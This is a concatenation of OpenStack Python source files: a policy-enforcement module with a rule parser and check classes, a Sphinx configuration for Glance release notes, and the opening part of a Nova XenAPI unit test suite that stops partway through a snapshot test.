        :param rules: New rules to use. It should be an instance of dict.
        :param overwrite: Whether to overwrite current rules or update them
                          with the new rules.
        """

        if not isinstance(rules, dict):
            raise TypeError(_("Rules must be an instance of dict or Rules, "
                            "got %s instead") % type(rules))

        if overwrite:
            self.rules = Rules(rules)
        else:
            self.update(rules)

    def clear(self):
        """Clears Enforcer rules, policy's cache and policy's path."""
        self.set_rules({})
        self.policy_path = None

    def load_rules(self, force_reload=False):
        """Loads policy_path's rules.

        Policy file is cached and will be reloaded if modified.

        :param force_reload: Whether to overwrite current rules.
        """

        if not self.policy_path:
            self.policy_path = self._get_policy_path()

        reloaded, data = fileutils.read_cached_file(self.policy_path,
                                                    force_reload=force_reload)

        if reloaded:
            rules = Rules.load_json(data, self.default_rule)
            self.set_rules(rules)
            LOG.debug(_("Rules successfully reloaded"))

    def _get_policy_path(self):
        """Locate the policy json data file.

        :param policy_file: Custom policy file to locate.

        :returns: The policy path

        :raises: ConfigFilesNotFoundError if the file couldn't
                 be located.
        """
        policy_file = CONF.find_file(self.policy_file)

        if policy_file:
            return policy_file

        raise cfg.ConfigFilesNotFoundError(path=CONF.policy_file)

    def enforce(self, rule, target, creds, do_raise=False,
                exc=None, *args, **kwargs):
        """Checks authorization of a rule against the target and credentials.

        :param rule: A string or BaseCheck instance specifying the rule
                    to evaluate.
        :param target: As much information about the object being operated
                    on as possible, as a dictionary.
        :param creds: As much information about the user performing the
                    action as possible, as a dictionary.
        :param do_raise: Whether to raise an exception or not if check
                        fails.
        :param exc: Class of the exception to raise if the check fails.
                    Any remaining arguments passed to check() (both
                    positional and keyword arguments) will be passed to
                    the exception class. If not specified, PolicyNotAuthorized
                    will be used.

        :return: Returns False if the policy does not allow the action and
                exc is not provided; otherwise, returns a value that
                evaluates to True.  Note: for rules using the "case"
                expression, this True value will be the specified string
                from the expression.
        """

        # NOTE(flaper87): Not logging target or creds to avoid
        # potential security issues.
        LOG.debug(_("Rule %s will be now enforced") % rule)

        self.load_rules()

        # Allow the rule to be a Check tree
        if isinstance(rule, BaseCheck):
            result = rule(target, creds, self)
        elif not self.rules:
            # No rules to reference means we're going to fail closed
            result = False
        else:
            try:
                # Evaluate the rule
                result = self.rules[rule](target, creds, self)
            except KeyError:
                LOG.debug(_("Rule [%s] doesn't exist") % rule)
                # If the rule doesn't exist, fail closed
                result = False

        # If it is False, raise the exception if requested
        if do_raise and not result:
            if exc:
                raise exc(*args, **kwargs)

            raise PolicyNotAuthorized(rule)

        return result


class BaseCheck(object):
    """Abstract base class for Check classes."""

    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def __str__(self):
        """String representation of the Check tree rooted at this node."""

        pass

    @abc.abstractmethod
    def __call__(self, target, cred):
        """Triggers if instance of the class is called.

        Performs the check. Returns False to reject the access or a
        true value (not necessary True) to accept the access.
        """

        pass


class FalseCheck(BaseCheck):
    """A policy check that always returns False (disallow)."""

    def __str__(self):
        """Return a string representation of this check."""

        return "!"

    def __call__(self, target, cred):
        """Check the policy."""

        return False


class TrueCheck(BaseCheck):
    """A policy check that always returns True (allow)."""

    def __str__(self):
        """Return a string representation of this check."""

        return "@"

    def __call__(self, target, cred):
        """Check the policy."""

        return True


class Check(BaseCheck):
    """A base class to allow for user-defined policy checks."""

    def __init__(self, kind, match):
        """Initiates Check instance.

        :param kind: The kind of the check, i.e., the field before the
                     ':'.
        :param match: The match of the check, i.e., the field after
                      the ':'.
        """

        self.kind = kind
        self.match = match

    def __str__(self):
        """Return a string representation of this check."""

        return "%s:%s" % (self.kind, self.match)


class NotCheck(BaseCheck):
    """Implements the "not" logical operator.

    A policy check that inverts the result of another policy check.
    """

    def __init__(self, rule):
        """Initialize the 'not' check.

        :param rule: The rule to negate.  Must be a Check.
        """

        self.rule = rule

    def __str__(self):
        """Return a string representation of this check."""

        return "not %s" % self.rule

    def __call__(self, target, cred):
        """Check the policy.

        Returns the logical inverse of the wrapped check.
        """

        return not self.rule(target, cred)


class AndCheck(BaseCheck):
    """Implements the "and" logical operator.

    A policy check that requires that a list of other checks all return True.
    """

    def __init__(self, rules):
        """Initialize the 'and' check.

        :param rules: A list of rules that will be tested.
        """

        self.rules = rules

    def __str__(self):
        """Return a string representation of this check."""

        return "(%s)" % ' and '.join(str(r) for r in self.rules)

    def __call__(self, target, cred):
        """Check the policy.

        Requires that all rules accept in order to return True.
        """

        for rule in self.rules:
            if not rule(target, cred):
                return False

        return True

    def add_check(self, rule):
        """Adds rule to be tested.

        Allows addition of another rule to the list of rules that will
        be tested.  Returns the AndCheck object for convenience.
        """

        self.rules.append(rule)
        return self


class OrCheck(BaseCheck):
    """Implements the "or" operator.

    A policy check that requires that at least one of a list of other
    checks returns True.
    """

    def __init__(self, rules):
        """Initialize the 'or' check.

        :param rules: A list of rules that will be tested.
        """

        self.rules = rules

    def __str__(self):
        """Return a string representation of this check."""

        return "(%s)" % ' or '.join(str(r) for r in self.rules)

    def __call__(self, target, cred):
        """Check the policy.

        Requires that at least one rule accept in order to return True.
        """

        for rule in self.rules:
            if rule(target, cred):
                return True

        return False

    def add_check(self, rule):
        """Adds rule to be tested.

        Allows addition of another rule to the list of rules that will
        be tested.  Returns the OrCheck object for convenience.
        """

        self.rules.append(rule)
        return self


def _parse_check(rule):
    """Parse a single base check rule into an appropriate Check object."""

    # Handle the special checks
    if rule == '!':
        return FalseCheck()
    elif rule == '@':
        return TrueCheck()

    try:
        kind, match = rule.split(':', 1)
    except Exception:
        LOG.exception(_("Failed to understand rule %s") % rule)
        # If the rule is invalid, we'll fail closed
        return FalseCheck()

    # Find what implements the check
    if kind in _checks:
        return _checks[kind](kind, match)
    elif None in _checks:
        return _checks[None](kind, match)
    else:
        LOG.error(_("No handler for matches of kind %s") % kind)
        return FalseCheck()


def _parse_list_rule(rule):
    """Translates the old list-of-lists syntax into a tree of Check objects.

    Provided for backwards compatibility.
    """

    # Empty rule defaults to True
    if not rule:
        return TrueCheck()

    # Outer list is joined by "or"; inner list by "and"
    or_list = []
    for inner_rule in rule:
        # Elide empty inner lists
        if not inner_rule:
            continue

        # Handle bare strings
        if isinstance(inner_rule, basestring):
            inner_rule = [inner_rule]

        # Parse the inner rules into Check objects
        and_list = [_parse_check(r) for r in inner_rule]

        # Append the appropriate check to the or_list
        if len(and_list) == 1:
            or_list.append(and_list[0])
        else:
            or_list.append(AndCheck(and_list))

    # If we have only one check, omit the "or"
    if not or_list:
        return FalseCheck()
    elif len(or_list) == 1:
        return or_list[0]

    return OrCheck(or_list)


# Used for tokenizing the policy language
_tokenize_re = re.compile(r'\s+')


def _parse_tokenize(rule):
    """Tokenizer for the policy language.

    Most of the single-character tokens are specified in the
    _tokenize_re; however, parentheses need to be handled specially,
    because they can appear inside a check string.  Thankfully, those
    parentheses that appear inside a check string can never occur at
    the very beginning or end ("%(variable)s" is the correct syntax).
    """

    for tok in _tokenize_re.split(rule):
        # Skip empty tokens
        if not tok or tok.isspace():
            continue

        # Handle leading parens on the token
        clean = tok.lstrip('(')
        for i in range(len(tok) - len(clean)):
            yield '(', '('

        # If it was only parentheses, continue
        if not clean:
            continue
        else:
            tok = clean

        # Handle trailing parens on the token
        clean = tok.rstrip(')')
        trail = len(tok) - len(clean)

        # Yield the cleaned token
        lowered = clean.lower()
        if lowered in ('and', 'or', 'not'):
            # Special tokens
            yield lowered, clean
        elif clean:
            # Not a special token, but not composed solely of ')'
            if len(tok) >= 2 and ((tok[0], tok[-1]) in
                                  [('"', '"'), ("'", "'")]):
                # It's a quoted string
                yield 'string', tok[1:-1]
            else:
                yield 'check', _parse_check(clean)

        # Yield the trailing parens
        for i in range(trail):
            yield ')', ')'


class ParseStateMeta(type):
    """Metaclass for the ParseState class.

    Facilitates identifying reduction methods.
    """

    def __new__(mcs, name, bases, cls_dict):
        """Create the class.

        Injects the 'reducers' list, a list of tuples matching token sequences
        to the names of the corresponding reduction methods.
        """

        reducers = []

        for key, value in cls_dict.items():
            if not hasattr(value, 'reducers'):
                continue
            for reduction in value.reducers:
                reducers.append((reduction, key))

        cls_dict['reducers'] = reducers

        return super(ParseStateMeta, mcs).__new__(mcs, name, bases, cls_dict)


def reducer(*tokens):
    """Decorator for reduction methods.

    Arguments are a sequence of tokens, in order, which should trigger running
    this reduction method.
    """

    def decorator(func):
        # Make sure we have a list of reducer sequences
        if not hasattr(func, 'reducers'):
            func.reducers = []

        # Add the tokens to the list of reducer sequences
        func.reducers.append(list(tokens))

        return func

    return decorator


class ParseState(object):
    """Implement the core of parsing the policy language.

    Uses a greedy reduction algorithm to reduce a sequence of tokens into
    a single terminal, the value of which will be the root of the Check tree.

    Note: error reporting is rather lacking.  The best we can get with
    this parser formulation is an overall "parse failed" error.
    Fortunately, the policy language is simple enough that this
    shouldn't be that big a problem.
    """

    __metaclass__ = ParseStateMeta

    def __init__(self):
        """Initialize the ParseState."""

        self.tokens = []
        self.values = []

    def reduce(self):
        """Perform a greedy reduction of the token stream.

        If a reducer method matches, it will be executed, then the
        reduce() method will be called recursively to search for any more
        possible reductions.
        """

        for reduction, methname in self.reducers:
            if (len(self.tokens) >= len(reduction) and
                    self.tokens[-len(reduction):] == reduction):
                # Get the reduction method
                meth = getattr(self, methname)

                # Reduce the token stream
                results = meth(*self.values[-len(reduction):])

                # Update the tokens and values
                self.tokens[-len(reduction):] = [r[0] for r in results]
                self.values[-len(reduction):] = [r[1] for r in results]

                # Check for any more reductions
                return self.reduce()

    def shift(self, tok, value):
        """Adds one more token to the state.  Calls reduce()."""

        self.tokens.append(tok)
        self.values.append(value)

        # Do a greedy reduce...
        self.reduce()

    @property
    def result(self):
        """Obtain the final result of the parse.

        Raises ValueError if the parse failed to reduce to a single result.
        """

        if len(self.values) != 1:
            raise ValueError("Could not parse rule")
        return self.values[0]

    @reducer('(', 'check', ')')
    @reducer('(', 'and_expr', ')')
    @reducer('(', 'or_expr', ')')
    def _wrap_check(self, _p1, check, _p2):
        """Turn parenthesized expressions into a 'check' token."""

        return [('check', check)]

    @reducer('check', 'and', 'check')
    def _make_and_expr(self, check1, _and, check2):
        """Create an 'and_expr'.

        Join two checks by the 'and' operator.
        """

        return [('and_expr', AndCheck([check1, check2]))]

    @reducer('and_expr', 'and', 'check')
    def _extend_and_expr(self, and_expr, _and, check):
        """Extend an 'and_expr' by adding one more check."""

        return [('and_expr', and_expr.add_check(check))]

    @reducer('check', 'or', 'check')
    def _make_or_expr(self, check1, _or, check2):
        """Create an 'or_expr'.

        Join two checks by the 'or' operator.
        """

        return [('or_expr', OrCheck([check1, check2]))]

    @reducer('or_expr', 'or', 'check')
    def _extend_or_expr(self, or_expr, _or, check):
        """Extend an 'or_expr' by adding one more check."""

        return [('or_expr', or_expr.add_check(check))]

    @reducer('not', 'check')
    def _make_not_expr(self, _not, check):
        """Invert the result of another check."""

        return [('check', NotCheck(check))]


def _parse_text_rule(rule):
    """Parses policy to the tree.

    Translates a policy written in the policy language into a tree of
    Check objects.
    """

    # Empty rule means always accept
    if not rule:
        return TrueCheck()

    # Parse the token stream
    state = ParseState()
    for tok, value in _parse_tokenize(rule):
        state.shift(tok, value)

    try:
        return state.result
    except ValueError:
        # Couldn't parse the rule
        LOG.exception(_("Failed to understand rule %(rule)r") % locals())

        # Fail closed
        return FalseCheck()


def parse_rule(rule):
    """Parses a policy rule into a tree of Check objects."""

    # If the rule is a string, it's in the policy language
    if isinstance(rule, basestring):
        return _parse_text_rule(rule)
    return _parse_list_rule(rule)


def register(name, func=None):
    """Register a function or Check class as a policy check.

    :param name: Gives the name of the check type, e.g., 'rule',
                 'role', etc.  If name is None, a default check type
                 will be registered.
    :param func: If given, provides the function or class to register.
                 If not given, returns a function taking one argument
                 to specify the function or class to register,
                 allowing use as a decorator.
    """

    # Perform the actual decoration by registering the function or
    # class.  Returns the function or class for compliance with the
    # decorator interface.
    def decorator(func):
        _checks[name] = func
        return func

    # If the function or class is given, do the registration
    if func:
        return decorator(func)

    return decorator


@register("rule")
class RuleCheck(Check):
    def __call__(self, target, creds, enforcer):
        """Recursively checks credentials based on the defined rules."""

        try:
            return enforcer.rules[self.match](target, creds, enforcer)
        except KeyError:
            # We don't have any matching rule; fail closed
            return False


@register("role")
class RoleCheck(Check):
    def __call__(self, target, creds, enforcer):
        """Check that there is a matching role in the cred dict."""

        return self.match.lower() in [x.lower() for x in creds['roles']]


@register('http')
class HttpCheck(Check):
    def __call__(self, target, creds, enforcer):
        """Check http: rules by calling to a remote server.

        This example implementation simply verifies that the response
        is exactly 'True'.
        """

        url = ('http:' + self.match) % target
        data = {'target': jsonutils.dumps(target),
                'credentials': jsonutils.dumps(creds)}
        post_data = urllib.urlencode(data)
        f = urllib2.urlopen(url, post_data)
        return f.read() == "True"


@register(None)
class GenericCheck(Check):
    def __call__(self, target, creds, enforcer):
        """Check an individual match.

        Matches look like:

            tenant:%(tenant_id)s
            role:compute:admin
        """

        # TODO(termie): do dict inspection via dot syntax
        match = self.match % target
        if self.kind in creds:
            return match == six.text_type(creds[self.kind])
        return False

# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Glance Release Notes documentation build configuration file, created by
# sphinx-quickstart on Tue Nov  3 17:40:50 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))

# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'oslosphinx',
    'reno.sphinxext',
]

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
# source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'cellar Release Notes'
copyright = u'2016, OpenStack Foundation'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# The full version, including alpha/beta/rc tags.
release = ''
# The short X.Y version.
version = ''

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []

# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []

# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False


# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
html_theme = 'default'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []

# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
# html_title = None

# A shorter title for the navigation bar.  Default is the same as html_title.
# html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}

# If false, no module index is generated.
# html_domain_indices = True

# If false, no index is generated.
# html_use_index = True

# If true, the index is split into individual pages for each letter.
# html_split_index = False

# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'GlanceReleaseNotesdoc'


# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    # 'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt').
    # 'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    # 'preamble': '',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    ('index', 'GlanceReleaseNotes.tex', u'Glance Release Notes Documentation',
     u'Glance Developers', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False

# If true, show page references after internal links.
# latex_show_pagerefs = False

# If true, show URL addresses after external links.
# latex_show_urls = False

# Documents to append as an appendix to all manuals.
# latex_appendices = []

# If false, no module index is generated.
# latex_domain_indices = True


# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'glancereleasenotes', u'Glance Release Notes Documentation',
     [u'Glance Developers'], 1)
]

# If true, show URL addresses after external links.
# man_show_urls = False


# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    ('index', 'GlanceReleaseNotes', u'Glance Release Notes Documentation',
     u'Glance Developers', 'GlanceReleaseNotes',
     'One line description of project.',
     'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
# texinfo_appendices = []

# If false, no module index is generated.
# texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'

# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False

# vim: tabstop=4 shiftwidth=4 softtabstop=4

#    Copyright (c) 2010 Citrix Systems, Inc.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

"""Test suite for XenAPI."""

import ast
import contextlib
import datetime
import functools
import os
import re

import mox

from nova.compute import aggregate_states
from nova.compute import instance_types
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova import context
from nova import db
from nova import exception
from nova import flags
from nova import log as logging
from nova.openstack.common import importutils
from nova import test
from nova.tests.db import fakes as db_fakes
from nova.tests import fake_network
from nova.tests import fake_utils
from nova.tests.glance import stubs as glance_stubs
from nova.tests.xenapi import stubs
from nova.virt.xenapi import connection as xenapi_conn
from nova.virt.xenapi import fake as xenapi_fake
from nova.virt.xenapi import vm_utils
from nova.virt.xenapi import vmops
from nova.virt.xenapi import volume_utils

LOG = logging.getLogger(__name__)

FLAGS = flags.FLAGS


def stub_vm_utils_with_vdi_attached_here(function, should_return=True):
    """
    vm_utils.with_vdi_attached_here needs to be stubbed out because it
    calls down to the filesystem to attach a vdi. This provides a
    decorator to handle that.
    """
    @functools.wraps(function)
    def decorated_function(self, *args, **kwargs):
        @contextlib.contextmanager
        def fake_vdi_attached_here(*args, **kwargs):
            fake_dev = 'fakedev'
            yield fake_dev

        def fake_stream_disk(*args, **kwargs):
            pass

        def fake_is_vdi_pv(*args, **kwargs):
            return should_return

        orig_vdi_attached_here = vm_utils.vdi_attached_here
        orig_stream_disk = vm_utils._stream_disk
        orig_is_vdi_pv = vm_utils._is_vdi_pv
        try:
            vm_utils.vdi_attached_here = fake_vdi_attached_here
            vm_utils._stream_disk = fake_stream_disk
            vm_utils._is_vdi_pv = fake_is_vdi_pv
            return function(self, *args, **kwargs)
        finally:
            vm_utils._is_vdi_pv = orig_is_vdi_pv
            vm_utils._stream_disk = orig_stream_disk
            vm_utils.vdi_attached_here = orig_vdi_attached_here

    return decorated_function


class XenAPIVolumeTestCase(test.TestCase):
    """Unit tests for Volume operations."""
    def setUp(self):
        super(XenAPIVolumeTestCase, self).setUp()
        self.user_id = 'fake'
        self.project_id = 'fake'
        self.context = context.RequestContext(self.user_id, self.project_id)
        self.flags(target_host='127.0.0.1',
                xenapi_connection_url='test_url',
                xenapi_connection_password='test_pass',
                firewall_driver='nova.virt.xenapi.firewall.'
                                'Dom0IptablesFirewallDriver')
        db_fakes.stub_out_db_instance_api(self.stubs)
        xenapi_fake.reset()
        self.instance_values = {'id': 1,
                  'project_id': self.user_id,
                  'user_id': 'fake',
                  'image_ref': 1,
                  'kernel_id': 2,
                  'ramdisk_id': 3,
                  'root_gb': 20,
                  'instance_type_id': '3',  # m1.large
                  'os_type': 'linux',
                  'architecture': 'x86-64'}

    def _create_volume(self, size='0'):
        """Create a volume object."""
        vol = {}
        vol['size'] = size
        vol['user_id'] = 'fake'
        vol['project_id'] = 'fake'
        vol['host'] = 'localhost'
        vol['availability_zone'] = FLAGS.storage_availability_zone
        vol['status'] = "creating"
        vol['attach_status'] = "detached"
        return db.volume_create(self.context, vol)

    @staticmethod
    def _make_info():
        return {
            'driver_volume_type': 'iscsi',
            'data': {
                'volume_id': 1,
                'target_iqn': 'iqn.2010-10.org.openstack:volume-00000001',
                'target_portal': '127.0.0.1:3260,fake',
                'target_lun': None,
                'auth_method': 'CHAP',
                'auth_method': 'fake',
                'auth_method': 'fake',
            }
        }

    def test_mountpoint_to_number(self):
        cases = {
            'sda': 0,
            'sdp': 15,
            'hda': 0,
            'hdp': 15,
            'vda': 0,
            'xvda': 0,
            '0': 0,
            '10': 10,
            'vdq': -1,
            'sdq': -1,
            'hdq': -1,
            'xvdq': -1,
        }

        for (input, expected) in cases.iteritems():
            func = volume_utils.VolumeHelper.mountpoint_to_number
            actual = func(input)
            self.assertEqual(actual, expected,
                    '%s yielded %s, not %s' % (input, actual, expected))

    def test_parse_volume_info_raise_exception(self):
        """This shows how to test helper classes' methods."""
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVolumeTests)
        session = xenapi_conn.XenAPISession('test_url', 'root', 'test_pass')
        helper = volume_utils.VolumeHelper
        helper.XenAPI = session.get_imported_xenapi()
        vol = self._create_volume()
        # oops, wrong mount point!
        self.assertRaises(volume_utils.StorageError,
                          helper.parse_volume_info,
                          self._make_info(),
                          'dev/sd'
                          )
        db.volume_destroy(context.get_admin_context(), vol['id'])

    def test_attach_volume(self):
        """This shows how to test Ops classes' methods."""
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVolumeTests)
        conn = xenapi_conn.get_connection(False)
        volume = self._create_volume()
        instance = db.instance_create(self.context, self.instance_values)
        vm = xenapi_fake.create_vm(instance.name, 'Running')
        result = conn.attach_volume(self._make_info(),
                                    instance.name, '/dev/sdc')

        # check that the VM has a VBD attached to it
        # Get XenAPI record for VBD
        vbds = xenapi_fake.get_all('VBD')
        vbd = xenapi_fake.get_record('VBD', vbds[0])
        vm_ref = vbd['VM']
        self.assertEqual(vm_ref, vm)

    def test_attach_volume_raise_exception(self):
        """This shows how to test when exceptions are raised."""
        stubs.stubout_session(self.stubs,
                              stubs.FakeSessionForVolumeFailedTests)
        conn = xenapi_conn.get_connection(False)
        volume = self._create_volume()
        instance = db.instance_create(self.context, self.instance_values)
        xenapi_fake.create_vm(instance.name, 'Running')
        self.assertRaises(exception.VolumeDriverNotFound,
                          conn.attach_volume,
                          {'driver_volume_type': 'nonexist'},
                          instance.name,
                          '/dev/sdc')


class XenAPIVMTestCase(test.TestCase):
    """Unit tests for VM operations."""
    def setUp(self):
        super(XenAPIVMTestCase, self).setUp()
        self.network = importutils.import_object(FLAGS.network_manager)
        self.flags(xenapi_connection_url='test_url',
                   xenapi_connection_password='test_pass',
                   instance_name_template='%d',
                   firewall_driver='nova.virt.xenapi.firewall.'
                                   'Dom0IptablesFirewallDriver')
        xenapi_fake.reset()
        xenapi_fake.create_local_srs()
        xenapi_fake.create_local_pifs()
        db_fakes.stub_out_db_instance_api(self.stubs)
        xenapi_fake.create_network('fake', FLAGS.flat_network_bridge)
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        stubs.stubout_get_this_vm_uuid(self.stubs)
        stubs.stubout_stream_disk(self.stubs)
        stubs.stubout_is_vdi_pv(self.stubs)
        stubs.stub_out_vm_methods(self.stubs)
        glance_stubs.stubout_glance_client(self.stubs)
        fake_utils.stub_out_utils_execute(self.stubs)
        self.user_id = 'fake'
        self.project_id = 'fake'
        self.context = context.RequestContext(self.user_id, self.project_id)
        self.conn = xenapi_conn.get_connection(False)

    def test_init_host(self):
        session = xenapi_conn.XenAPISession('test_url', 'root', 'test_pass')
        vm = vm_utils.get_this_vm_ref(session)
        # Local root disk
        vdi0 = xenapi_fake.create_vdi('compute', None)
        vbd0 = xenapi_fake.create_vbd(vm, vdi0)
        # Instance VDI
        vdi1 = xenapi_fake.create_vdi('instance-aaaa', None,
                other_config={'nova_instance_uuid': 'aaaa'})
        vbd1 = xenapi_fake.create_vbd(vm, vdi1)
        # Only looks like instance VDI
        vdi2 = xenapi_fake.create_vdi('instance-bbbb', None)
        vbd2 = xenapi_fake.create_vbd(vm, vdi2)

        self.conn.init_host(None)
        self.assertEquals(set(xenapi_fake.get_all('VBD')), set([vbd0, vbd2]))

    def test_list_instances_0(self):
        instances = self.conn.list_instances()
        self.assertEquals(instances, [])

    def test_get_rrd_server(self):
        self.flags(xenapi_connection_url='myscheme://myaddress/')
        server_info = vm_utils.get_rrd_server()
        self.assertEqual(server_info[0], 'myscheme')
        self.assertEqual(server_info[1], 'myaddress')

    def test_get_diagnostics(self):
        def fake_get_rrd(host, vm_uuid):
            with open('xenapi/vm_rrd.xml') as f:
                return re.sub(r'\s', '', f.read())
        self.stubs.Set(vm_utils, 'get_rrd', fake_get_rrd)

        fake_diagnostics = {
            'vbd_xvdb_write': '0.0',
            'memory_target': '10961792000.0000',
            'memory_internal_free': '3612860.6020',
            'memory': '10961792000.0000',
            'vbd_xvda_write': '0.0',
            'cpu0': '0.0110',
            'vif_0_tx': '752.4007',
            'vbd_xvda_read': '0.0',
            'vif_0_rx': '4837.8805'
        }
        instance = self._create_instance()
        expected = self.conn.get_diagnostics(instance)
        self.assertDictMatch(fake_diagnostics, expected)

    def test_instance_snapshot_fails_with_no_primary_vdi(self):
        def create_bad_vbd(vm_ref, vdi_ref):
            vbd_rec = {'VM': vm_ref,
               'VDI': vdi_ref,
               'userdevice': 'fake',
               'currently_attached': False}
            vbd_ref = xenapi_fake._create_object('VBD', vbd_rec)
            xenapi_fake.after_VBD_create(vbd_ref, vbd_rec)
            return vbd_ref

        self.stubs.Set(xenapi_fake, 'create_vbd', create_bad_vbd)
        stubs.stubout_instance_snapshot(self.stubs)
        # Stubbing out firewall driver as previous stub sets alters
        # xml rpc result parsing
        stubs.stubout_firewall_driver(self.stubs, self.conn)
        instance = self._create_instance()

        name = "MySnapshot"
        self.assertRaises(exception.NovaException, self.conn.snapshot,
                          self.context, instance, name)

    def test_instance_snapshot(self):
        stubs.stubout_instance_snapshot(self.stubs)
        stubs.stubout_is_snapshot(self.stubs)
        # Stubbing out firewall driver as previous stub sets alters
        # xml rpc result parsing
        stubs.stubout_firewall_driver(self.stubs, self.conn)
        instance = self._create_instance()

        name = "MySnapshot"
        template_vm_ref = self.conn.snapshot(self.context, instance, name)

        # Ensure VM was torn down
        vm_labels = []
        for vm_ref in xenapi_fake.get_all('VM'):
            vm_rec = xenapi_fake.get_record('VM', vm_ref)
            if not vm_rec["is_control_domain"]:
                vm_labels.append(vm_rec["name_label"])

        self.assertEquals(vm_labels, [instance.name])

        # Ensure VBDs were torn down
        vbd_labels = []
        for vbd_ref in xenapi_fake.get_all('VBD'):
            vbd_rec = xenapi_fake.get_record('VBD', vbd_ref)
            vbd_labels.append(vbd_rec["vm_name_label"])

        self.assertEquals(vbd_labels, [instance.name])

        # Ensure VDIs were torn down
        for vdi_ref in xenapi_fake.get_all('VDI'):
            vdi_rec = xenapi_fake.get_record('VDI', vdi_ref)
            name_label = vdi_rec["name_label"]
